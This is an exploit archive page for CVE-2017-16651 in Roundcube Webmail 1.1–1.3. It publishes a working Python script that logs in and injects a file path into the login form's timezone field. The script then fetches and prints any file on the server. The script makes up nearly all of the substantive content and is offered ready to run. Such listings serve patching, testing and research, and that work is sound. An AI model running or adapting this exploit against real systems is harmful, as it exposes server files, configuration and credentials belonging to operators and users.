exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Roundcube Webmail 1.2 File Disclosure

Roundcube Webmail 1.2 File Disclosure
Posted Feb 1, 2021
Authored by stonepresto

Roundcube Webmail version 1.2 suffers from a file disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2017-16651
SHA-256 | 3ea9d4b9d2c7673808c4851506092371bb0861ff694274c0cd863aa7631d642e

Roundcube Webmail 1.2 File Disclosure

Change Mirror Download
# Exploit Title: Roundcube Webmail 1.2 - File Disclosure 
# Date: 09-11-2017
# Exploit Author: stonepresto
# Vendor Homepage: https://roundcube.net/
# Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/
# Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
# Tested on: roundcube version 1.2-beta
# CVE : CVE-2017-16651

#!/usr/bin/env python3
# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1
# https://github.com/stonepresto/CVE-2017-16651
# Exploit Author: stonepresto

import requests
import re
import sys

URL="https://127.0.0.1/"
USER="user@example.com"
PASS="password"

def main():
s = requests.Session()
r = s.get(URL,params={"_task":"login"},verify=False)
token = None
for line in r.text.split("\n"):
if 'name="_token"' in line:
token = line.split("value=")[1].split('"')[1]
print("[+] token: %s" % token)
if token is None:
print("[!] unable to retrieve token")
sys.exit(1)

data = {
"_token":token,
"_task":"login",
"_action":"login",
"_timezone[files][1][path]":sys.argv[1],
"_url":"_task%3Dlogin",
"_user":USER,
"_pass":PASS
}
r = s.post(URL,params={"_task":"login"},data=data,verify=False)

params = {
"_task":"settings",
"_action":"upload-display",
"_from":"timezone",
"_file":"rcmfile1"
}

r = s.get(URL,params=params,verify=False)
print(r.text)

if __name__ == "__main__":
if len(sys.argv) != 2:
print("[!] Usage: %s <file-to-read>" % sys.argv[0])
else:
main()

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close